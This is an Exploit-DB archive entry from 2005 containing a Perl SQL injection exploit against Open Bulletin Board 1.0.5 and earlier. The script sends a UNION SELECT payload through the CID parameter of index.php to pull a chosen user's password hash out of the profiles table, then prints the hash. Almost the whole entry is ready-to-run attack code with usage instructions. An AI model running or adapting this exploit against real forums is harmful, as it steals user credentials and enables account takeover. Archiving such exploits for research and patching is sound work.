Open Bulletin Board <= 1.0.5 - SQL Injection Exploit

2005-07-18T00:00:00
ID EDB-ID:1111
Type exploitdb
Reporter RusH
Modified 2005-07-18T00:00:00

Description

Open Bulletin Board <= 1.0.5 SQL Injection Exploit. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl -w 
  
 # OpenBB sql injection 
 # tested on Open Bulletin Board 1.0.5 with mysql 
 # (c)oded by x97Rang 2005 RST/GHC 
 # Gr33tz:  __blf, 1dt.w0lf 
  
 use IO::Socket; 
  
 if (@ARGV != 3) 
 { 
    print "\nUsage: $0 [server] [path] [id]\n"; 
    print "like $0 forum.mysite.com / 1\n"; 
    print "If found nothing - forum NOT vulnerable\n\n"; 
    exit (); 
 } 
  
 $server = $ARGV[0]; 
 $path = $ARGV[1]; 
 $id = $ARGV[2]; 
  
 $socket = IO::Socket::INET-&gt;new( Proto =&gt; "tcp", PeerAddr =&gt; "$server",  PeerPort =&gt; "80"); 
 printf $socket ("GET %sindex.php?CID=999+union+select+1,1,password,1,1,1,1,1,1,1,1,id,1+from+profiles+where+id=$id/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n", 
  $path,$server,$id); 
  
 while(&lt;$socket&gt;) 
 { 
     if (/\&gt;(\w{32})\&lt;/) { print "$1\n"; } 
 }

# milw0rm.com [2005-07-18]